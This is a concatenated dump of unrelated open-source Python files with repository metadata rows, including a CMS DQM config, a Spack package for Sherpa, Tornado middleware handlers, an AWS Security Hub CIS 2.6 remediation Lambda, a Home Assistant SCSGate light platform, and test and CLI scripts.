process.stripQTester.qtestOnEndRun = cms.untracked.bool(True)
process.trackingQTester.qtList = cms.untracked.FileInPath('DQM/TrackingMonitorClient/data/tracking_qualitytest_config_heavyion.xml')
process.trackingQTester.prescaleFactor = cms.untracked.int32(1)
process.trackingQTester.getQualityTestsFromFile = cms.untracked.bool(True)
process.trackingQTester.qtestOnEndLumi = cms.untracked.bool(True)
process.trackingQTester.qtestOnEndRun = cms.untracked.bool(True)
# Reco for pp collisions
process.load('RecoTracker.IterativeTracking.InitialStepPreSplitting_cff')
    # The Task-based removals below supersede the old Sequence-based ones.
process.InitialStepPreSplittingTask.remove(process.initialStepTrackRefsForJetsPreSplitting)
process.InitialStepPreSplittingTask.remove(process.caloTowerForTrkPreSplitting)
process.InitialStepPreSplittingTask.remove(process.ak4CaloJetsForTrkPreSplitting)
process.InitialStepPreSplittingTask.remove(process.jetsForCoreTrackingPreSplitting)
process.InitialStepPreSplittingTask.remove(process.siPixelClusters)
process.InitialStepPreSplittingTask.remove(process.siPixelRecHits)
process.InitialStepPreSplittingTask.remove(process.MeasurementTrackerEvent)
# Redefinition of siPixelClusters: has to be after RecoTracker.IterativeTracking.InitialStepPreSplitting_cff
process.load("RecoLocalTracker.SiPixelClusterizer.SiPixelClusterizer_cfi")
# Select events based on the pixel cluster multiplicity
import HLTrigger.special.hltPixelActivityFilter_cfi
process.multFilter = HLTrigger.special.hltPixelActivityFilter_cfi.hltPixelActivityFilter.clone(
inputTag = cms.InputTag('siPixelClusters'),
minClusters = cms.uint32(1),
maxClusters = cms.uint32(50000)
)
# BaselineValidator Module
from EventFilter.SiStripRawToDigi.SiStripDigis_cfi import siStripDigis as _siStripDigis
process.siStripDigisNoZS=_siStripDigis.clone()
process.siStripDigisNoZS.ProductLabel = cms.InputTag("rawDataCollector")
process.SiStripBaselineValidator.srcProcessedRawDigi = cms.InputTag('siStripDigisNoZS','ZeroSuppressed')
from RecoTracker.TkSeedingLayers.PixelLayerTriplets_cfi import *
process.PixelLayerTriplets.BPix.HitProducer = cms.string('siPixelRecHitsPreSplitting')
process.PixelLayerTriplets.FPix.HitProducer = cms.string('siPixelRecHitsPreSplitting')
from RecoPixelVertexing.PixelTrackFitting.PixelTracks_cff import *
process.pixelTracksHitTriplets.SeedComparitorPSet.clusterShapeCacheSrc = 'siPixelClusterShapeCachePreSplitting'
process.RecoForDQM_TrkReco = cms.Sequence(process.offlineBeamSpot*process.MeasurementTrackerEventPreSplitting*process.siPixelClusterShapeCachePreSplitting*process.recopixelvertexing*process.InitialStepPreSplitting)
process.p = cms.Path(
process.scalersRawToDigi*
process.APVPhases*
process.consecutiveHEs*
process.hltTriggerTypeFilter*
process.siStripFEDCheck *
process.siStripDigisNoZS*
process.SiStripBaselineValidator*
process.RecoForDQM_LocalReco*
process.siPixelClusters*
process.DQMCommon*
process.SiStripClients*
process.SiStripSources_LocalReco*
process.multFilter*
##### TRIGGER SELECTION #####
process.hltHighLevel*
process.RecoForDQM_TrkReco*
process.SiStripSources_TrkReco*
process.TrackingClient
)
### process customizations included here
from DQM.Integration.config.online_customizations_cfi import *
process = customise(process)
| 50.51932
| 261
| 0.73533
|
4a18ba430a346f2d7651e2fe26e33fa186d1de08
| 7,221
|
py
|
Python
|
var/spack/repos/builtin/packages/sherpa/package.py
|
varioustoxins/spack
|
cab0e4cb240f34891a6d753f3393e512f9a99e9a
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
var/spack/repos/builtin/packages/sherpa/package.py
|
varioustoxins/spack
|
cab0e4cb240f34891a6d753f3393e512f9a99e9a
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 6
|
2022-01-08T08:41:11.000Z
|
2022-03-14T19:28:07.000Z
|
var/spack/repos/builtin/packages/sherpa/package.py
|
foeroyingur/spack
|
5300cbbb2e569190015c72d0970d25425ea38647
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Sherpa(AutotoolsPackage):
"""Sherpa is a Monte Carlo event generator for the Simulation of
High-Energy Reactions of PArticles in lepton-lepton, lepton-photon,
photon-photon, lepton-hadron and hadron-hadron collisions."""
homepage = "https://sherpa-team.gitlab.io"
url = "https://gitlab.com/sherpa-team/sherpa/-/archive/v2.2.11/sherpa-v2.2.11.tar.gz"
list_url = "https://gitlab.com/sherpa-team/sherpa/-/tags"
git = "https://gitlab.com/sherpa-team/sherpa.git"
tags = ['hep', 'eic']
maintainers = ['wdconinc', 'vvolkl']
version('2.2.12', sha256='4ba78098e45aaac0bc303d1b5abdc15809f30b407abf9457d99b55e63384c83d')
version('2.2.11', sha256='5e12761988b41429f1d104f84fdf352775d233cde7a165eb64e14dcc20c3e1bd')
version('2.2.10', sha256='ae23bc8fdcc9f8c26becc41692822233b62203cd72a7e0dab2ca19316aa0aad7')
version('2.2.9', sha256='ebc836d42269a0c4049d3fc439a983d19d12595d9a06db2d18765bd1e301923e')
version('2.2.8', sha256='ff198cbae5de445e6fe383151021ef24b1628dffc0da6bf3737753f6672a0091')
version('2.0.0', sha256='0e873b27bb1be46ca5ed451d1b8514ca84c10221057b11be5952180076e6f848')
version('1.3.1', sha256='31881207838d341358db64e3fdadfeee1ea2f6d1cb42f370014f622f579159ae')
version('1.3.0', sha256='08b13c65b66f2edde6996d2a06762a12a0682ffb64bca43654df47321e5039a0')
version('1.2.3', sha256='029727337a430d6675a1a12dce3ced0411041e79ddaf4ce3b9466035cf6c8804')
version('1.2.2', sha256='6e7b5ea80b99f1378519009e494030d6cf4c4491f91218d749eabb8ffaad9ac1')
version('1.2.1', sha256='838462f4a1e8768135363aa6b8532fd8f5e5789a269b858f8e3728ab37f6a1d1')
version('1.2.0', sha256='509508fd0ad72aaf55ab484da8b6bc0b31688c955adcda62a3e8f94689cebf99')
version('1.1.3', sha256='6335e5eb1fc304e9618496d3ddb198b3591e57b27db6e876af8fd649a8b98c93')
version('1.1.2', sha256='e1689cad6700dc013af0afb0d33729ac2b5e9841d2f325c85b10d773e7f8a80e')
version('1.1.1', sha256='b80e1d75934be79b73400d2c95d96e88651626ea29ddcb9d8fde9c1812039e29')
version('1.1.0', sha256='8052d137d668353dc710f8691b921e772820d39e20361f0d616ee2da1ac798f2')
version('1.0.9', sha256='fe28db91ea8264364395c7e5efeeae3e5c01ea1343e0db7fe13924c6f17fb963')
version('1.0.8', sha256='6e346bafd13b5b05ad566a73759da6d5e64d65c5036780cc4911d93277e891fa')
version('1.0.7', sha256='d1eeefd96c6822ea8eb926447ca91ec4a1c714e4746323e92b1e17764e51ff0b')
version('1.0.6', sha256='358d417ec3afde24618c222bc9b742bc5102d435622b3cd6f2e3f72d03656255')
_cxxstd_values = ('11', '14', '17')
variant('cxxstd', default='11', values=_cxxstd_values, multi=False,
description='Use the specified C++ standard when building')
variant('analysis', default=True, description='Enable analysis components')
variant('mpi', default=False, description='Enable MPI')
variant('python', default=False, description='Enable Python API')
variant('hepmc2', default=True, description='Enable HepMC (version 2.x) support')
variant('hepmc3', default=True, description='Enable HepMC (version 3.x) support')
variant('hepmc3root', default=False, description='Enable HepMC (version 3.1+) ROOT support')
variant('rivet', default=False, description='Enable Rivet support')
variant('fastjet', default=True, description='Enable FASTJET')
variant('openloops', default=False, description='Enable OpenLoops')
variant('recola', default=False, description='Enable Recola')
variant('lhole', default=False, description='Enable Les Houches One-Loop Generator interface')
variant('root', default=False, description='Enable ROOT support')
variant('lhapdf', default=True, description='Enable LHAPDF support')
variant('gzip', default=False, description='Enable gzip support')
variant('pythia', default=True, description='Enable fragmentation/decay interface to Pythia')
# Note that the delphes integration seems utterly broken: https://sherpa.hepforge.org/trac/ticket/305
depends_on('autoconf', type='build')
depends_on('automake', type='build')
depends_on('libtool', type='build')
depends_on('m4', type='build')
depends_on('texinfo', type='build')
depends_on('sqlite')
depends_on('mpi', when='+mpi')
depends_on('python', when='+python')
depends_on('swig', when='+python', type='build')
depends_on('hepmc', when='+hepmc2')
depends_on('hepmc3', when='+hepmc3')
depends_on('hepmc3 +rootio', when='+hepmc3root')
depends_on('rivet', when='+rivet')
depends_on('fastjet', when='+fastjet')
depends_on('openloops', when='+openloops')
depends_on('recola', when='+recola')
depends_on('root', when='+root')
depends_on('lhapdf', when='+lhapdf')
depends_on('gzip', when='+gzip')
depends_on('pythia6', when='+pythia')
for std in _cxxstd_values:
depends_on('root cxxstd=' + std, when='+root cxxstd=' + std)
def patch(self):
filter_file(r'#include <sys/sysctl.h>',
'#ifdef ARCH_DARWIN\n#include <sys/sysctl.h>\n#endif',
'ATOOLS/Org/Run_Parameter.C')
def configure_args(self):
args = []
args.append('--enable-shared')
args.append('--enable-binreloc')
args.append('--enable-static')
args.append('--enable-hepevtsize=200000')
args.append('--with-sqlite3=' + self.spec['sqlite'].prefix)
args.extend(self.enable_or_disable('mpi'))
if self.spec.satisfies('+python'):
args.append('--enable-pyext')
args.extend(self.enable_or_disable('analysis'))
args.extend(self.enable_or_disable('lhole'))
args.extend(self.enable_or_disable('gzip'))
args.extend(self.enable_or_disable('pythia'))
if self.spec.satisfies('+hepmc2'):
args.append('--enable-hepmc2=' + self.spec['hepmc'].prefix)
if self.spec.satisfies('+hepmc3'):
args.append('--enable-hepmc3=' + self.spec['hepmc3'].prefix)
if self.spec.satisfies('+rivet'):
args.append('--enable-rivet=' + self.spec['rivet'].prefix)
if self.spec.satisfies('+fastjet'):
args.append('--enable-fastjet=' + self.spec['fastjet'].prefix)
if self.spec.satisfies('+openloops'):
args.append('--enable-openloops=' + self.spec['openloops'].prefix)
if self.spec.satisfies('+recola'):
args.append('--enable-recola=' + self.spec['recola'].prefix)
if self.spec.satisfies('+root'):
args.append('--enable-root=' + self.spec['root'].prefix)
if self.spec.satisfies('+lhapdf'):
args.append('--enable-lhapdf=' + self.spec['lhapdf'].prefix)
        # NOTE: the 'hztool' and 'cernlib' variants are not declared above, so
        # these branches are inert unless those variants are (re)introduced.
        if self.spec.satisfies('+hztool'):
            args.append('--enable-hztool=' + self.spec['hztool'].prefix)
        if self.spec.satisfies('+cernlib'):
            args.append('--enable-cernlib=' + self.spec['cernlib'].prefix)
return args
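    # Editor's note (hedged): a typical install exercising the variants declared
    # above would be, e.g.
    #   spack install sherpa@2.2.12 cxxstd=14 +rivet +openloops
    # (exact variant availability depends on the local Spack instance).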
| 55.546154
| 105
| 0.689932
|
4a18ba84f4cb1d725b674a908e7491effee8c85f
| 2,162
|
py
|
Python
|
loquat/handler.py
|
guanzhenxing/loquat
|
cdfe7464ed48bde448355ad6bc830e5d94760b6e
|
[
"MIT"
] | null | null | null |
loquat/handler.py
|
guanzhenxing/loquat
|
cdfe7464ed48bde448355ad6bc830e5d94760b6e
|
[
"MIT"
] | null | null | null |
loquat/handler.py
|
guanzhenxing/loquat
|
cdfe7464ed48bde448355ad6bc830e5d94760b6e
|
[
"MIT"
] | null | null | null |
import logging
from typing import Optional, Awaitable, Any, Union
import tornado.web
from tornado import httputil
from .middleware import MiddlewareType
logger = logging.getLogger(__name__)
class MiddlewareHandlerMixin(object):
def __init__(self, application, request, **kwargs: Any) -> None:
super().__init__(application, request, **kwargs)
self.middleware_manager = self.application.middleware_manager
def prepare(self) -> Optional[Awaitable[None]]:
"""
        Called at the very beginning of every request, before get/post/etc.
"""
super().prepare()
return self._process_middlewares(mw_type=MiddlewareType.BEFORE_REQUEST)
def on_finish(self) -> None:
"""在一个请求结束后被调用."""
super().on_finish()
self._process_middlewares(mw_type=MiddlewareType.HANDLE_FINISHED)
    def finish(self, chunk: Optional[Union[str, bytes, dict]] = None) -> "Future[None]":
        """Called when the response is being finished."""
        # write() may have been called several times before finish(), so chunk may be None.
        # The real payload lives in self._write_buffer, which accumulates data from each write().
        # Flush the remaining chunk into _write_buffer here, then clear it before delegating.
if chunk:
self.write(chunk)
chunk = None
self._process_middlewares(MiddlewareType.AFTER_RESPONSE, chunk)
return super().finish(chunk)
def _process_middlewares(self, mw_type, *args, **kwargs):
"""根据中间件类型执行中间件"""
self.middleware_manager.run_middleware_type(mw_type, self, *args, **kwargs)
class _PatchHandler(tornado.web.RequestHandler):
def __init__(self, application, request, **kwargs) -> None:
super().__init__(application, request, **kwargs)
def data_received(self, chunk: bytes) -> Optional[Awaitable[None]]:
pass
class BaseHandler(_PatchHandler):
"""A class to collect common handler methods - all other handlers should subclass this one.
"""
def __init__(self, application: "Application", request: httputil.HTTPServerRequest, **kwargs: Any) -> None:
super().__init__(application, request, **kwargs)
class RestfulHandler(BaseHandler):
def __init__(self, application, request, **kwargs: Any) -> None:
super().__init__(application, request, **kwargs)
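# Editor's sketch (not part of the original module): wiring the mixin into a
# concrete handler. The mixin must come first in the MRO so its prepare/
# on_finish/finish hooks wrap the request lifecycle, and the application is
# assumed to expose a `middleware_manager` attribute, as the mixin's __init__
# requires.
class PingHandler(MiddlewareHandlerMixin, RestfulHandler):
    async def get(self):
        self.write({'status': 'ok'})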
| 32.757576
| 111
| 0.685939
|
4a18bad7bb2393ea6346c8f27c2cc82d14d0472c
| 8,991
|
py
|
Python
|
source/playbooks/CIS/lambda/cis26.py
|
fuellbie/aws-security-hub-automated-response-and-remediation
|
3de36c0d1d1d84fb175dad88343bd54d819e5c78
|
[
"Apache-2.0"
] | null | null | null |
source/playbooks/CIS/lambda/cis26.py
|
fuellbie/aws-security-hub-automated-response-and-remediation
|
3de36c0d1d1d84fb175dad88343bd54d819e5c78
|
[
"Apache-2.0"
] | null | null | null |
source/playbooks/CIS/lambda/cis26.py
|
fuellbie/aws-security-hub-automated-response-and-remediation
|
3de36c0d1d1d84fb175dad88343bd54d819e5c78
|
[
"Apache-2.0"
] | 2
|
2021-11-08T04:05:48.000Z
|
2021-11-08T04:55:53.000Z
|
#!/usr/bin/python
###############################################################################
# Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License Version 2.0 (the "License"). You may not #
# use this file except in compliance with the License. A copy of the License #
# is located at #
# #
# http://www.apache.org/licenses/ #
# #
# or in the "license" file accompanying this file. This file is distributed #
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, express #
# or implied. See the License for the specific language governing permis- #
# sions and limitations under the License. #
###############################################################################
import os
import hashlib
from botocore.config import Config
import botocore
from lib.sechub_findings import Finding, notify
from lib.logger import Logger
from lib.awsapi_helpers import AWSClient, BotoSession
from lib.applogger import LogHandler
from lib.metrics import Metrics
from lib.aws_utils import resource_from_arn
#------------------------------
# Remediation-Specific
#------------------------------
LAMBDA_ROLE = 'SO0111_CIS26_memberRole'
REMEDIATION = 'Enable Access Logging on CloudTrail logs bucket'
AFFECTED_OBJECT = 'CloudTrail'
LOGGING_BUCKET_PREFIX = 'so0111-sharr-cloudtrailaccessLogs'
#------------------------------
PLAYBOOK = os.path.basename(__file__[:-3])
# initialise LOGGERs
LOG_LEVEL = os.getenv('log_level', 'info')
LOGGER = Logger(loglevel=LOG_LEVEL)
APPLOGGER = LogHandler(PLAYBOOK) # application LOGGER for CW Logs
# Get AWS region from Lambda environment. If not present then we're not
# running under lambda, so defaulting to us-east-1
AWS_REGION = os.getenv('AWS_DEFAULT_REGION', 'us-east-1')
AWS_PARTITION = os.getenv('AWS_PARTITION', 'aws')
# Append region name to LAMBDA_ROLE
LAMBDA_ROLE += '_' + AWS_REGION
BOTO_CONFIG = Config(
retries={
'max_attempts': 10
},
region_name=AWS_REGION
)
AWS = AWSClient(AWS_PARTITION, AWS_REGION)
#------------------------------------------------------------------------------
# HANDLER
#------------------------------------------------------------------------------
def lambda_handler(event, context):
LOGGER.debug(event)
metrics = Metrics(event)
try:
for finding_rec in event['detail']['findings']:
finding = Finding(finding_rec)
LOGGER.info('FINDING_ID: ' + str(finding.details.get('Id')))
remediate(finding, metrics.get_metrics_from_finding(finding_rec))
except Exception as e:
LOGGER.error(e)
APPLOGGER.flush() # flush the buffer to CW Logs
#------------------------------------------------------------------------------
# REMEDIATION
#------------------------------------------------------------------------------
def remediate(finding, metrics_data):
message = {
'Note': '',
'State': 'INFO',
'Account': finding.account_id,
'Remediation': REMEDIATION,
'metrics_data': metrics_data
}
def failed():
"""
Send Failed status message
"""
message['State'] = 'FAILED'
message['Note'] = ''
notify(finding, message, LOGGER, cwlogs=APPLOGGER)
    # A custom action can be initiated for any finding, so verify that the
    # selected finding actually matches this playbook; otherwise ignore it.
cis_data = finding.is_cis_ruleset()
if not cis_data:
# Not an applicable finding - does not match ruleset
# send an error and exit
LOGGER.debug('CIS 2.6: incorrect custom action selection.')
APPLOGGER.add_message('CIS 2.6: incorrect custom action selection.')
return
if (cis_data['ruleid'] not in ['2.6']):
# Not an applicable finding - does not match rule
# send an error and exit
LOGGER.debug('CIS 2.6: incorrect custom action selection.')
APPLOGGER.add_message('CIS 2.6: incorrect custom action selection.')
return
resource_type = str(finding.details['Resources'][0]["Type"])
if resource_type == 'AwsAccount':
        # This branch handles findings whose resource type is AwsAccount.
        # Such a finding refers to the account as a whole rather than to a
        # specific resource, so there is no specific remediation here: it
        # resolves itself once the resource-specific findings are fixed.
LOGGER.debug('for finding type AwsAccount, there is no resolution.')
APPLOGGER.add_message('AwsAccount is a general finding for the entire account. Once the specific findings are resolved for resource type(s) other than AwsAccount, \
this will be marked as resolved.')
message['State'] = 'INITIAL'
message['Note'] = 'The finding is related to the AWS account.'
notify(finding, message, LOGGER, cwlogs=APPLOGGER)
return
#==========================================================================
# Parse ARN of non-compliant resource from Security Hub CWE
try:
ctBucket = str(finding.details['Resources'][0]['Id'])
# Remove ARN string, create new variable
formattedCTBucket = resource_from_arn(ctBucket)
except Exception as e:
message['Note'] = str(e) + ' - Finding format is not as expected.'
message['State'] = 'FAILED'
notify(finding, message, LOGGER, cwlogs=APPLOGGER)
return
message['AffectedObject'] = AFFECTED_OBJECT + ': ' + formattedCTBucket
try:
sess = BotoSession(finding.account_id, LAMBDA_ROLE)
ssm = sess.client('ssm')
s3 = sess.client('s3')
except Exception as e:
LOGGER.error(e)
failed()
return
# Mark the finding NOTIFIED while we remediate
message['State'] = 'INITIAL'
notify(finding, message, LOGGER, cwlogs=APPLOGGER)
# Create a bucket for the access logs
# The same bucket is used to log access for all CloudTrails in the same account
accessLoggingBucket = LOGGING_BUCKET_PREFIX + "-" + finding.account_id + "-" + AWS_REGION
accessLoggingBucket = accessLoggingBucket.lower()
try:
kwargs = {
'Bucket': accessLoggingBucket,
'GrantWrite': 'uri=http://acs.amazonaws.com/groups/s3/LogDelivery',
'GrantReadACP': 'uri=http://acs.amazonaws.com/groups/s3/LogDelivery'
}
if AWS_REGION != 'us-east-1':
kwargs['CreateBucketConfiguration'] = {
'LocationConstraint': AWS_REGION
}
s3.create_bucket(**kwargs)
s3.put_bucket_encryption(
Bucket=accessLoggingBucket,
ServerSideEncryptionConfiguration={
'Rules': [
{
'ApplyServerSideEncryptionByDefault': {
'SSEAlgorithm': 'AES256'
}
}
]
}
)
except botocore.exceptions.ClientError as error:
if error.response['Error']['Code'] == 'BucketAlreadyExists':
pass
elif error.response['Error']['Code'] == 'BucketAlreadyOwnedByYou':
pass
else:
LOGGER.error(error)
failed()
return
except Exception as e:
LOGGER.error(e)
failed()
return
# execute automation with ConfigureS3BucketLogging Document
try:
response = ssm.start_automation_execution(
DocumentName='AWS-ConfigureS3BucketLogging',
DocumentVersion='1',
Parameters={
'BucketName': [formattedCTBucket],
'GrantedPermission': ['READ'],
'GranteeType': ['Group'],
'GranteeUri': ['http://acs.amazonaws.com/groups/s3/LogDelivery'], ## Must Use URI, fails with Canonical Group Id
'TargetPrefix' : [formattedCTBucket + '/'],
'TargetBucket': [accessLoggingBucket],
'AutomationAssumeRole': ['arn:' + AWS_PARTITION + ':iam::' + \
finding.account_id + ':role/' + LAMBDA_ROLE]
}
)
LOGGER.debug(response)
message['Note'] = '\"' + REMEDIATION + '\" remediation was successfully invoked via AWS Systems Manager'
message['State'] = 'RESOLVED'
notify(finding, message, LOGGER, cwlogs=APPLOGGER, sns=AWS)
except Exception as e:
LOGGER.error(e)
failed()
return
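
# --- Illustrative invocation sketch (field values are assumptions, not from
# the source). lambda_handler() iterates event['detail']['findings'], so a
# Security Hub custom-action event is expected to look roughly like:
#
#     event = {
#         "detail": {
#             "findings": [
#                 {   # one ASFF finding, as consumed by Finding()
#                     "Id": "arn:aws:securityhub:us-east-1:111122223333:...",
#                     "AwsAccountId": "111122223333",
#                     "Resources": [
#                         {"Type": "AwsS3Bucket",
#                          "Id": "arn:aws:s3:::example-trail-bucket"}
#                     ],
#                 }
#             ]
#         }
#     }
#     lambda_handler(event, None)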
| 39.96
| 172
| 0.566567
|
4a18bc05092f09f2b9cb9db4b9460e022c8c8674
| 1,517
|
py
|
Python
|
main.py
|
nickyjaspers/textracematrix
|
a36b3cf297e5b30684309663270643846caf86f2
|
[
"MIT"
] | null | null | null |
main.py
|
nickyjaspers/textracematrix
|
a36b3cf297e5b30684309663270643846caf86f2
|
[
"MIT"
] | null | null | null |
main.py
|
nickyjaspers/textracematrix
|
a36b3cf297e5b30684309663270643846caf86f2
|
[
"MIT"
] | null | null | null |
import getopt
import sys
import os
from code_parser import CodeParser
from file_browser import FileBrowser
from matrix_writer import MatrixWriter
def usage():
print("===============================================")
print("Get requirements trace matrix mapping for files")
print("")
print("-d [BASEDIR] (default = '.')")
print("-e [FILE EXTENSION] (default = '*.java')")
print("")
print("A mapping is recognized when following pattern is found in a file:")
print("// REQ: req1, req2")
print("@Test")
print("public void TestMethod()")
print("")
print("===============================================")
def main():
try:
        opts, args = getopt.getopt(sys.argv[1:], "hd:e:", ["help", "basedir=", "extension="])  # long options need '=' to accept a value
except getopt.GetoptError as err:
print(str(err))
usage()
sys.exit(2)
extension = '*.java'
base_dir = os.path.dirname(os.path.abspath(__file__))
for o, a in opts:
if o in ("-h", "--help"):
usage()
sys.exit()
elif o in ("-d", "--basedir"):
base_dir = a
elif o in ("-e", "--extension"):
extension = a
else:
assert False, "unhandled option"
files = FileBrowser.get_files(basedir=base_dir, extension=extension)
parser = CodeParser()
for f in files:
parser.get_requirements_and_test_cases(f)
writer = MatrixWriter(parser.req_test_mapping)
writer.write()
if __name__ == "__main__":
main()
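
# Example invocations (paths are placeholders):
#   python main.py -d ./src/test/java -e "*.java"
#   python main.py --basedir ./tests --extension "*.py"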
| 27.581818
| 91
| 0.556361
|
4a18bc996724f97e2a43cc5d3c46c399997f07c2
| 3,345
|
py
|
Python
|
homeassistant/components/light/scsgate.py
|
dauden1184/home-assistant
|
f4c6d389b77d0efa86644e76604eaea5d21abdb5
|
[
"Apache-2.0"
] | 4
|
2019-01-10T14:47:54.000Z
|
2021-04-22T02:06:27.000Z
|
homeassistant/components/light/scsgate.py
|
dauden1184/home-assistant
|
f4c6d389b77d0efa86644e76604eaea5d21abdb5
|
[
"Apache-2.0"
] | 6
|
2021-02-08T20:25:50.000Z
|
2022-03-11T23:27:53.000Z
|
homeassistant/components/light/scsgate.py
|
dauden1184/home-assistant
|
f4c6d389b77d0efa86644e76604eaea5d21abdb5
|
[
"Apache-2.0"
] | 3
|
2018-08-29T19:26:20.000Z
|
2020-01-19T11:58:22.000Z
|
"""
Support for SCSGate lights.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/light.scsgate/
"""
import logging
import voluptuous as vol
from homeassistant.components import scsgate
from homeassistant.components.light import (Light, PLATFORM_SCHEMA)
from homeassistant.const import (
ATTR_ENTITY_ID, ATTR_STATE, CONF_DEVICES, CONF_NAME)
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
DEPENDENCIES = ['scsgate']
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_DEVICES): vol.Schema({cv.slug: scsgate.SCSGATE_SCHEMA}),
})
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the SCSGate switches."""
devices = config.get(CONF_DEVICES)
lights = []
logger = logging.getLogger(__name__)
if devices:
for _, entity_info in devices.items():
if entity_info[scsgate.CONF_SCS_ID] in scsgate.SCSGATE.devices:
continue
name = entity_info[CONF_NAME]
scs_id = entity_info[scsgate.CONF_SCS_ID]
logger.info("Adding %s scsgate.light", name)
light = SCSGateLight(name=name, scs_id=scs_id, logger=logger)
lights.append(light)
add_entities(lights)
scsgate.SCSGATE.add_devices_to_register(lights)
class SCSGateLight(Light):
"""Representation of a SCSGate light."""
def __init__(self, scs_id, name, logger):
"""Initialize the light."""
self._name = name
self._scs_id = scs_id
self._toggled = False
self._logger = logger
@property
def scs_id(self):
"""Return the SCS ID."""
return self._scs_id
@property
def should_poll(self):
"""No polling needed for a SCSGate light."""
return False
@property
def name(self):
"""Return the name of the device if any."""
return self._name
@property
def is_on(self):
"""Return true if light is on."""
return self._toggled
def turn_on(self, **kwargs):
"""Turn the device on."""
from scsgate.tasks import ToggleStatusTask
scsgate.SCSGATE.append_task(
ToggleStatusTask(target=self._scs_id, toggled=True))
self._toggled = True
self.schedule_update_ha_state()
def turn_off(self, **kwargs):
"""Turn the device off."""
from scsgate.tasks import ToggleStatusTask
scsgate.SCSGATE.append_task(
ToggleStatusTask(target=self._scs_id, toggled=False))
self._toggled = False
self.schedule_update_ha_state()
def process_event(self, message):
"""Handle a SCSGate message related with this light."""
if self._toggled == message.toggled:
self._logger.info(
"Light %s, ignoring message %s because state already active",
self._scs_id, message)
# Nothing changed, ignoring
return
self._toggled = message.toggled
self.schedule_update_ha_state()
command = "off"
if self._toggled:
command = "on"
self.hass.bus.fire(
'button_pressed', {
ATTR_ENTITY_ID: self._scs_id,
ATTR_STATE: command,
}
)
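
# --- Illustrative configuration sketch (slug, name and scs_id are
# placeholders). PLATFORM_SCHEMA maps device slugs to SCSGATE_SCHEMA
# entries, so a configuration.yaml block would look roughly like:
#
#     light:
#       - platform: scsgate
#         devices:
#           living_room:
#             name: Living room
#             scs_id: "0A"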
| 27.644628
| 78
| 0.63707
|
4a18bd455bc4406e6bd79e045fa787a88f66438b
| 1,593
|
py
|
Python
|
test/unit/test_all_unit.py
|
muchu1983/104_cameo
|
8c7f78de198a5bd8d870589402e3b7e8b59f520a
|
[
"BSD-3-Clause"
] | 1
|
2017-05-25T20:25:20.000Z
|
2017-05-25T20:25:20.000Z
|
test/unit/test_all_unit.py
|
muchu1983/104_findfine
|
b2255db6327324e89b914fd93a81f7ea5eac6f64
|
[
"BSD-3-Clause"
] | null | null | null |
test/unit/test_all_unit.py
|
muchu1983/104_findfine
|
b2255db6327324e89b914fd93a81f7ea5eac6f64
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Copyright (C) 2015, MuChu Hsu
Contributed by Muchu Hsu (muchu1983@gmail.com)
This file is part of BSD license
<https://opensource.org/licenses/BSD-3-Clause>
"""
import unittest
from test.unit.test_player import PlayerTest
from test.unit.test_world import WorldTest
from test.unit.test_serverthread import ServerThreadTest
from test.unit.test_jsonrequesthandler import JsonRequestHandlerTest
from test.unit.test_message import MessageTest
from test.unit.test_client import ClientTest
from test.unit.test_lockedcase import LockedCaseTest
"""
執行所有單元測試
"""
suite_of_all_unit = unittest.TestSuite()
# Load the TestCases
suite_of_player = unittest.TestLoader().loadTestsFromTestCase(PlayerTest)
suite_of_world = unittest.TestLoader().loadTestsFromTestCase(WorldTest)
suite_of_serverthread = unittest.TestLoader().loadTestsFromTestCase(ServerThreadTest)
suite_of_jsonrequesthandler = unittest.TestLoader().loadTestsFromTestCase(JsonRequestHandlerTest)
suite_of_message = unittest.TestLoader().loadTestsFromTestCase(MessageTest)
suite_of_client = unittest.TestLoader().loadTestsFromTestCase(ClientTest)
suite_of_lockedcase = unittest.TestLoader().loadTestsFromTestCase(LockedCaseTest)
# Add the TestCases to the suite
suite_of_all_unit.addTest(suite_of_player)
suite_of_all_unit.addTest(suite_of_world)
suite_of_all_unit.addTest(suite_of_serverthread)
suite_of_all_unit.addTest(suite_of_jsonrequesthandler)
suite_of_all_unit.addTest(suite_of_message)
suite_of_all_unit.addTest(suite_of_client)
suite_of_all_unit.addTest(suite_of_lockedcase)
# Run the tests
unittest.TextTestRunner().run(suite_of_all_unit)
| 37.046512
| 97
| 0.85248
|
4a18bd4dbb2051653a62ab3c9f8414006b3b2666
| 5,492
|
py
|
Python
|
pypureclient/flasharray/FA_2_13/models/resource_performance_no_id_by_array_get_response.py
|
ashahid-ps/py-pure-client
|
2e3565d37b2a41db69308769f6f485d08a7c46c3
|
[
"BSD-2-Clause"
] | null | null | null |
pypureclient/flasharray/FA_2_13/models/resource_performance_no_id_by_array_get_response.py
|
ashahid-ps/py-pure-client
|
2e3565d37b2a41db69308769f6f485d08a7c46c3
|
[
"BSD-2-Clause"
] | null | null | null |
pypureclient/flasharray/FA_2_13/models/resource_performance_no_id_by_array_get_response.py
|
ashahid-ps/py-pure-client
|
2e3565d37b2a41db69308769f6f485d08a7c46c3
|
[
"BSD-2-Clause"
] | null | null | null |
# coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.13
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_13 import models
class ResourcePerformanceNoIdByArrayGetResponse(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'more_items_remaining': 'bool',
'total_item_count': 'int',
'continuation_token': 'str',
